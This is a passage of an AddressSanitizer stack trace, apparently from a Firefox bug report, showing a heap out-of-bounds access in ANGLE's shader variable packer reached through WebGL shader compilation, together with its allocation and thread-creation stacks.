    #0 0x7fd87b5ff063 in fillColumns /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:141:20
    #1 0x7fd87b5ff063 in checkExpandedVariablesWithinPackingLimits /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:266:5
    #2 0x7fd87b5ff063 in sh::CheckVariablesInPackingLimits(unsigned int, std::vector&lt;sh::ShaderVariable, std::allocator&lt;sh::ShaderVariable&gt;&gt; const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:404:19
    #3 0x7fd87b482496 in sh::TCompiler::checkAndSimplifyAST(sh::TIntermBlock*, sh::TParseContext const&amp;, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1041:18
    #4 0x7fd87b47f17f in sh::TCompiler::compileTreeImpl(char const* const*, unsigned long, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:497:10
    #5 0x7fd87b485ea8 in sh::TCompiler::compile(char const* const*, unsigned long, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1217:26
    #6 0x7fd87b3a78a7 in mozilla::webgl::ShaderValidator::ValidateAndTranslate(char const*) const /builds/worker/checkouts/gecko/dom/canvas/WebGLShaderValidator.cpp:253:7
    #7 0x7fd87b3a52b2 in mozilla::WebGLShader::CompileShader() /builds/worker/checkouts/gecko/dom/canvas/WebGLShader.cpp:101:34
    #8 0x7fd87b374d9d in CompileShader /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:1454:10
    #9 0x7fd87b374d9d in mozilla::HostWebGLContext::CompileShader(unsigned long) const /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:321:15
    #10 0x7fd87b374f8a in auto bool mozilla::MethodDispatcher&lt;mozilla::WebGLMethodDispatcher, 38ul, void (mozilla::HostWebGLContext::*)(unsigned long) const, &amp;mozilla::HostWebGLContext::CompileShader(unsigned long) const&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;(mozilla::HostWebGLContext&amp;, unsigned long, mozilla::webgl::RangeConsumerView&amp;)::'lambda'(auto&amp;...)::operator()&lt;unsigned long&gt;(auto&amp;...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #11 0x7fd87b340dd7 in __invoke_impl&lt;bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #12 0x7fd87b340dd7 in __invoke&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #13 0x7fd87b340dd7 in __apply_impl&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned long&gt; &amp;, 0UL&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #14 0x7fd87b340dd7 in apply&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned long&gt; &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #15 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #16 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #17 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #18 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #19 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #20 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #21 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #22 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #23 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7fd87b340dd7 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&amp;&amp;, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #55 0x7fd87b445c8a in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:236:79
    #56 0x7fd8780078c1 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:279:32
    #57 0x7fd876aeeb1d in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1813:25
    #58 0x7fd876aeb5e3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr&lt;IPC::Message, mozilla::DefaultDelete&lt;IPC::Message&gt;&gt;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1732:9
    #59 0x7fd876aec71b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1525:3
    #60 0x7fd876aed712 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1623:14
    #61 0x7fd8750a773f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1192:16
    #62 0x7fd8750b503a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
    #63 0x7fd876af7725 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #64 0x7fd87694468a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
    #65 0x7fd87694468a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
    #66 0x7fd87694468a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
    #67 0x7fd87509e84e in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:370:10
    #68 0x7fd8930b510f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #69 0x555cd968b0fa in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31
    #70 0x7fd892e94b42 in start_thread nptl/pthread_create.c:442:8
    #71 0x7fd892f269ff  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
0x5210019a8900 is located 0 bytes after 4096-byte region [0x5210019a7900,0x5210019a8900)
allocated by thread T18 here:
    #0 0x555cd968ec5e in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3
    #1 0x555cd96d41f5 in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fd87b602a4a in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fd87b602a4a in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27
    #4 0x7fd87b602a4a in allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436:20
    #5 0x7fd87b602a4a in _M_allocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296:20
    #6 0x7fd87b602a4a in std::vector&lt;unsigned int, std::allocator&lt;unsigned int&gt;&gt;::_M_fill_insert(__gnu_cxx::__normal_iterator&lt;unsigned int*, std::vector&lt;unsigned int, std::allocator&lt;unsigned int&gt;&gt;&gt;, unsigned long, unsigned int const&amp;) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:530:34
    #7 0x7fd87b5fea09 in resize /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:847:4
    #8 0x7fd87b5fea09 in checkExpandedVariablesWithinPackingLimits /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:230:11
    #9 0x7fd87b5fea09 in sh::CheckVariablesInPackingLimits(unsigned int, std::vector&lt;sh::ShaderVariable, std::allocator&lt;sh::ShaderVariable&gt;&gt; const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/VariablePacker.cpp:404:19
    #10 0x7fd87b482496 in sh::TCompiler::checkAndSimplifyAST(sh::TIntermBlock*, sh::TParseContext const&amp;, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1041:18
    #11 0x7fd87b47f17f in sh::TCompiler::compileTreeImpl(char const* const*, unsigned long, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:497:10
    #12 0x7fd87b485ea8 in sh::TCompiler::compile(char const* const*, unsigned long, ShCompileOptions const&amp;) /builds/worker/checkouts/gecko/gfx/angle/checkout/src/compiler/translator/Compiler.cpp:1217:26
    #13 0x7fd87b3a78a7 in mozilla::webgl::ShaderValidator::ValidateAndTranslate(char const*) const /builds/worker/checkouts/gecko/dom/canvas/WebGLShaderValidator.cpp:253:7
    #14 0x7fd87b3a52b2 in mozilla::WebGLShader::CompileShader() /builds/worker/checkouts/gecko/dom/canvas/WebGLShader.cpp:101:34
    #15 0x7fd87b374d9d in CompileShader /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:1454:10
    #16 0x7fd87b374d9d in mozilla::HostWebGLContext::CompileShader(unsigned long) const /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:321:15
    #17 0x7fd87b374f8a in auto bool mozilla::MethodDispatcher&lt;mozilla::WebGLMethodDispatcher, 38ul, void (mozilla::HostWebGLContext::*)(unsigned long) const, &amp;mozilla::HostWebGLContext::CompileShader(unsigned long) const&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;(mozilla::HostWebGLContext&amp;, unsigned long, mozilla::webgl::RangeConsumerView&amp;)::'lambda'(auto&amp;...)::operator()&lt;unsigned long&gt;(auto&amp;...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #18 0x7fd87b340dd7 in __invoke_impl&lt;bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #19 0x7fd87b340dd7 in __invoke&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned long &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #20 0x7fd87b340dd7 in __apply_impl&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned long&gt; &amp;, 0UL&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #21 0x7fd87b340dd7 in apply&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned long&gt; &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #22 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #23 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #55 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #56 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #57 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #58 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #59 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #60 0x7fd87b340dd7 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #61 0x7fd87b340dd7 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&amp;&amp;, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #62 0x7fd87b445c8a in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:236:79
    #63 0x7fd8780078c1 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:279:32
    #64 0x7fd876aeeb1d in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1813:25
    #65 0x7fd876aeb5e3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr&lt;IPC::Message, mozilla::DefaultDelete&lt;IPC::Message&gt;&gt;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1732:9
    #66 0x7fd876aec71b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1525:3
    #67 0x7fd876aed712 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1623:14
    #68 0x7fd8750a773f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1192:16
    #69 0x7fd8750b503a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
    #70 0x7fd876af7725 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #71 0x7fd87694468a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
    #72 0x7fd87694468a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
    #73 0x7fd87694468a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
    #74 0x7fd87509e84e in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:370:10
    #75 0x7fd8930b510f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #76 0x555cd968b0fa in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31
Thread T18 created by T0 here:
    #0 0x555cd967489d in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:237:3
    #1 0x7fd8930a3834 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7fd89309142e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7fd8750a2319 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:619:20
    #4 0x7fd8750b2bc4 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThreadManager::ThreadCreationOptions, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:597:22
    #5 0x7fd8750c03a5 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, nsIThreadManager::ThreadCreationOptions) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:176:57
    #6 0x7fd87816cde9 in NS_NewNamedThread&lt;9UL&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:76:10
    #7 0x7fd87816cde9 in mozilla::wr::RenderThread::Start(unsigned int) /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:122:17
    #8 0x7fd877de227b in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1312:7
    #9 0x7fd877ddb206 in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:970:3
